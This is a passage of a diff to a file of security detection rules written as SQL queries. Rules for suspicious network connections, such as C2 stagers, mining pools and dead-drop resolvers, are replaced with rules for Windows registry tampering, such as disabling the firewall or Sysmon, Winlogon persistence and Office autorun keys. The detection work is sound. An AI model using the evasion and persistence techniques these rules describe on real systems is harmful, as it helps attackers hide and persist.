'%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "net_connection_win_python.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Disable Microsoft Defender Firewall via Registry", + "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_disable_defender_firewall.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Registry Explorer Policy Modification", + "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "status": "test", + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1496" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_set_nopolicies_user.yml" }, { - "title": "Rundll32 Internet Connection", - "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", - "status": "test", - "description": "Detects a rundll32 that communicates with public IP addresses", - "author": "Florian Roth (Nextron Systems)", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "net_connection_win_rundll32_net_connections.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Office Autorun Keys Modification", + "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_asep_reg_keys_modification_office.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", + "status": "experimental", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\edge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "status": "test", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "falsepositives": [ - "Legitimate certutil network connection" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" }, { - "title": "Suspicious Non-Browser Network Communication With Reddit API", - "id": "d7b09985-95a3-44be-8450-b6eadf49833e", + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", "status": "experimental", - "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", - "author": "Gavin Knapp", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1102" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate applications communicating with the Reddit API e.g. web browsers not in exclusion list, app with an RSS etc." + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%reddit.com/api%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ExpressConnectNetworkService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" ], - "filename": "net_connection_win_reddit_api_non_browser_access.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", + "status": "experimental", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Web Browsers" + "Legitimate driver altitude change to hide sysmon" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "PowerShell Network Connections", - "id": "1f21ec3f-810d-4b0e-8045-322202e22b4b", - "status": "experimental", - "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", - "author": "Florian Roth (Nextron Systems)", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "status": "test", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft IP range" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_powershell_network_connection.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", - "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "status": "test", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE 